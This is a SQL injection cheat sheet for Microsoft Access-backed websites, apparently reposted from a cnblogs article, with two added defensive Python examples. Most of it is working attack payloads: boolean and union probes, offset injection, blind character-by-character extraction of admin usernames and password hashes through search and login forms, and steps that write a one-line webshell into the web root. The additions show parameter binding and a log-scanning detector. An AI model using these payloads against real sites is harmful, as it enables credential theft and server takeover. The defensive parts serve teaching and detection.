Access injection cheat sheet


     Access injection, Access offset injection, Access search-type injection, Access login-form injection

    1. Detecting injection.

    and 1=1
    and 1=2
    or
    -0
    -1   (watch how the page changes)

    2. Access injection.

    Union query
    order by 10
    and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
    and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin

    3. Access offset injection. Requires the table to have an id column.

    order by 13
    and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin    (add placeholder columns until * returns normally)

    13-9=4 (admin has 4 columns), 4*2=8 (the self-join doubles that), 13-8=5 (so 5 placeholders precede *)
    and 1=2 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id)


    4. Access: dumping column names

    select * from next where id=1 ORDER BY sum(1)
    Only one column name is revealed at a time; if it is, for example, bm_username, the others can be guessed from the naming pattern.

    Column names can also be found by viewing the source of the site's admin pages.

    5. Access search-type injection

    2010%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //returns normally: Access database
    2010%'and(select count(*)from admin)>0 and '%'=' //returns normally: admin table exists
    2010%'and(select count(username)from admin)>0 and '%'=' //returns normally: username column exists
    2010%'and(select count(password)from admin)>0 and '%'=' //returns normally: password column also exists
    2010%'and(select top 1 len(username)from admin)>4 and '%'=' //returns normally: username length greater than 4
    2010%'and(select top 1 len(username)from admin)=5 and '%'=' //returns normally: username length equals 5
    2010%'and(select top 1 len(password)from admin)=32 and '%'=' //returns normally: password is 32 characters, i.e. a hashed value

    username length 5
    password length 32

    2010%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'=' //a
    The lines below test the ASCII code of the character at each position; a wrong guess returns an error.
    2010%'and(select top 1 asc(mid(password,1,1))from admin)=48 and '%'='
    2010%'and(select top 1 asc(mid(password,2,1))from admin)=102 and '%'='
    2010%'and(select top 1 asc(mid(password,3,1))from admin)=101 and '%'='
    2010%'and(select top 1 asc(mid(password,4,1))from admin)=102 and '%'='

    This query is too slow; try a union query instead.
    2010%' order by 10 and '%'='
    2010%' and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin and '%'='
    2010%'and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin and '%'='
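    The search-form payloads above work because the search term is pasted into a LIKE pattern, so the closing quote and the appended condition become part of the query. The following is an added example, not code from the original post: it runs the page's "does the admin table exist" payload against an in-memory SQLite database standing in for Access (an assumption; the products and admin tables and their rows are constructed), once through string concatenation and once through a bound parameter, to show where the boolean oracle comes from and how parameter binding removes it.

```python
import sqlite3

# Payload taken from the page (search-type injection, "admin table exists" probe)
PAYLOAD = "2010%'and(select count(*)from admin)>0 and '%'='"


def make_db(with_admin_table: bool) -> sqlite3.Connection:
    """Constructed sample schema; SQLite is used as a stand-in for Access (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "report 2010"), (2, "report 2011")])
    if with_admin_table:
        conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
        conn.execute("INSERT INTO admin VALUES ('a', 'x')")
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # The search term is concatenated straight into the LIKE pattern: the
    # attacker's quote closes the string and the rest becomes SQL.
    sql = "SELECT id FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # The whole term (quotes, parentheses and all) is bound as one string value,
    # so it can only ever be matched as text inside the pattern.
    sql = "SELECT id FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def oracle_demo() -> dict:
    """Run the payload against both schemas through both code paths.

    Vulnerable path: results when admin exists, a database error when it does
    not (that difference is the oracle the page's probes rely on).
    Safe path: no rows either way, because nothing is named like the payload.
    """
    results = {}
    for has_admin in (True, False):
        conn = make_db(has_admin)
        try:
            results[("vulnerable", has_admin)] = search_vulnerable(conn, PAYLOAD)
        except sqlite3.OperationalError as exc:
            results[("vulnerable", has_admin)] = "error: " + str(exc)
        results[("safe", has_admin)] = search_safe(conn, PAYLOAD)
    return results


if __name__ == "__main__":
    for key, value in oracle_demo().items():
        print(key, "->", value)
```

    The concatenated query answers the attacker's question by either returning the matching product or failing outright, which is exactly the "returns normally / returns an error" signal the probes above read. The bound-parameter query behaves identically whether or not an admin table exists.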


    6. Access login-form injection

    1. a' or(select count(*) from admin)>0 and '1'='1
    2. a' or(select count(username) from admin)>0 and '1'='1
    3. a' or(select count(password) from admin)>0 and '1'='1

    This query is too slow; try a union query instead.

    a' union select 1,2,3,4,5,6,7,8,9,10 from admin and '1'='1
    a' union select 1,username,3,4,password,6,7,8,9,10 from admin and '1'='1
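    From the defender's side, the probes in sections 1 through 6 leave recognisable traces in the web server log: boolean tests, union column counting, references to the Access system tables and the character-by-character asc(mid(...)) loop. The following is an added example, not part of the original post: a small Python scanner over constructed access-log lines (IPs, paths and timestamps are made up) that URL-decodes each request target, matches it against signatures derived from the payloads above, and summarises which sources produced which kinds of probe.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (common log format); the query strings are
# URL-encoded the way a server would record them. Not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /news.asp?id=15 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /news.asp?id=15%20and%201%3D1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /news.asp?id=15%20and%201%3D2%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin HTTP/1.1" 200 480',
    '10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /search.asp?key=2010%25%27and(select%20count(*)from%20mssysaccessobjects)%3E0%20and%20%27%25%27%3D%27 HTTP/1.1" 200 300',
    '10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /search.asp?key=2010%25%27and(select%20top%201%20asc(mid(password,1,1))from%20admin)%3D48%20and%20%27%25%27%3D%27 HTTP/1.1" 200 300',
    '10.0.0.7 - - [01/Jan/2020:10:00:05 +0000] "GET /search.asp?key=order%20form HTTP/1.1" 200 900',
]

# Signatures derived from the payloads on this page. The system-table pattern
# accepts both the page's spelling (mssysaccessobjects) and MSysObjects.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("union-columns", re.compile(r"\bunion\s+select\b", re.I)),
    ("access-sysobjects", re.compile(r"\bms+ys\w*objects\b", re.I)),
    ("char-by-char", re.compile(r"\basc\s*\(\s*mid\s*\(", re.I)),
    ("offset-selfjoin", re.compile(r"\binner\s+join\s+\w+\s+as\s+\w+\s+on\b", re.I)),
]

# client, timestamp, method, target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')


def classify(line: str):
    """Parse one log line and return the signatures its decoded target matches."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    decoded = unquote_plus(target)  # decode %27, %3D, %20 etc. before matching
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    return {"src": src, "time": ts, "path": target.split("?")[0],
            "status": status, "hits": hits}


def scan(lines):
    """Return one alert record per line that matched at least one signature."""
    alerts = []
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            alerts.append(rec)
    return alerts


def summarize(lines):
    """Group signature names by source address, to see an enumeration sequence."""
    per_src = {}
    for rec in scan(lines):
        per_src.setdefault(rec["src"], set()).update(rec["hits"])
    return {src: sorted(names) for src, names in per_src.items()}


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["src"], rec["path"], rec["hits"])
    print(summarize(SAMPLE_LOG))
```

    Decoding before matching matters: the quote, equals sign and percent characters in these probes are almost always URL-encoded in the raw log. A single source that trips the boolean probe, then union column counting, then the system-table or character-by-character signatures is following the exact order of sections 1 to 5 above, which is a much stronger signal than any one line on its own.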


    7. Access: executing SQL statements to export a one-line shell and obtain a webshell

    First statement
    create table cmd (a varchar(50))
    Second statement
    insert into cmd (a) values ('一句话木马')
    Third statement
    select * into [a] in 'e:hostweb2011ok.asp;ok.xls' 'excel 4.0;' from cmd
    Fourth statement
    drop table cmd

    Original URL: https://www.cnblogs.com/spadd/p/4085350.html